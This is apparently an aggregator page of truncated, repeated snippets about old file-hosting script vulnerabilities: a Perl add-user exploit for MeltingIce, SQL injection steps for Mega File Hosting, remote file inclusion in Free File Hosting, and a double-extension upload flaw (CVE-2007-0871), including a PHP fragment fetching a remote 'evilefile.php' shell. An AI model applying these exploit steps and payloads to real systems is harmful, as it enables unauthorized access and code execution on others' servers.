meltingice-user.txt

!/usr/bin/perl use strict; use LWP::UserAgent; NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed! NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly because alot of these sites doesnt allow registratio...

MeltingIce File System <= 1.0 Remote Arbitrary Add-User Exploit

Exploit for unknown platform in category web applications =============================================================== MeltingIce File System ; print "\nUsernamecreate's your username: "; chompmy $usr=; print "\nPasswordcreate's your password: "; chompmy $pwd=; print "\nEnter Quotaquotamb of...

MeltingIce File System 1.0 - Arbitrary Add User

!/usr/bin/perl use strict; use LWP::UserAgent; NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed! NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly because alot of these sites doesnt allow registratio...

MeltingIce File System 1.0 - Arbitrary Add User

MeltingIce File System 1.0 - Arbitrary Add User !/usr/bin/perl use strict; use LWP::UserAgent; NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed! NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly...

Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability

No description provided by source. Script: Mega File Hosting script Type: SQL Injection 1923TURK.ORG TURKiSHWARRiORR Step 1: Register an account Step 2: login and go to /members.php?folders=1 Step 3: Create a folder with any name Exploitation options: ADIM 1:...

Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ===================================================================== Mega File Hosting Script 1.2 fid Remote SQL Injection Vulnerability ===================================================================== Script: Mega File Hosting scrip...

Mega File Hosting Script 1.2 - fid SQL Injection

Mega File Hosting Script 1.2 - fid SQL Injection Script: Mega File Hosting script Type: SQL Injection 1923TURK.ORG TURKiSHWARRiORR Step 1: Register an account Step 2: login and go to /members.php?folders=1 Step 3: Create a folder with any name Exploitation options: ADIM 1:...

megafile-sql.txt

Script: Mega File Hosting script Type: SQL Injection 1923TURK.ORG TURKiSHWARRiORR Step 1: Register an account Step 2: login and go to /members.php?folders=1 Step 3: Create a folder with any name Exploitation options: ADIM 1:...

Free File Hosting System远程文件包含漏洞

Free File Hosting System是一款基于PHP的WEB应用程序。 Free File Hosting System不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'ADBODYTEMP'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 Free PHP Scripts Free File Hosting 1.1 目前没有解决方案提供： http://www.free-php-scripts.net/...

Free File Hosting System 1.1 - &#039;login.php?AD_BODY_TEMP&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; othe...

Free File Hosting System 1.1 - login.php?AD_BODY_TEMP Remote File Inclusion

Free File Hosting System 1.1 - login.php?ADBODYTEMP Remote File Inclusion source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow...

Free File Hosting System 1.1 - contact.php?AD_BODY_TEMP Remote File Inclusion

Free File Hosting System 1.1 - contact.php?ADBODYTEMP Remote File Inclusion source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may all...

Free File Hosting System 1.1 - &#039;contact.php?AD_BODY_TEMP&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; othe...

Free File Hosting System 1.1 - &#039;register.php?AD_BODY_TEMP&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; othe...

Free File Hosting System 1.1 - register.php?AD_BODY_TEMP Remote File Inclusion

Free File Hosting System 1.1 - register.php?ADBODYTEMP Remote File Inclusion source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may...

CVE-2007-0871

Unrestricted file upload vulnerability in eXtremePow eXtreme File Hosting allows remote attackers to upload arbitrary PHP code via a filename with a double extension such as 1 .rar.php or 2 .zip.php...

Unrestricted file upload

Unrestricted file upload vulnerability in eXtremePow eXtreme File Hosting allows remote attackers to upload arbitrary PHP code via a filename with a double extension such as 1 .rar.php or 2 .zip.php...

CVE-2007-0871

Unrestricted file upload vulnerability in eXtremePow eXtreme File Hosting allows remote attackers to upload arbitrary PHP code via a filename with a double extension such as 1 .rar.php or 2 .zip.php...

CVE-2007-0871

The CVE-2007-0871 entry concerns the eXtremePow eXtreme File Hosting product, where an unrestricted file upload vulnerability exists. The underlying issue is that an attacker can upload files with double extensions (for example, .rar.php or .zip.php), enabling remote execution of PHP code on the ...

eXtreme File Hosting remote file upload vulnerability

A security bug have been discovered in eXtreme File Hosting, which can be upload the attaker files and can get the shell with phpshell. bug : in this borgram with php can user upload zip or rar file hacker can upload the a.php.rar file that contain ?php $file = 'http://sample.com/evilefile.php';...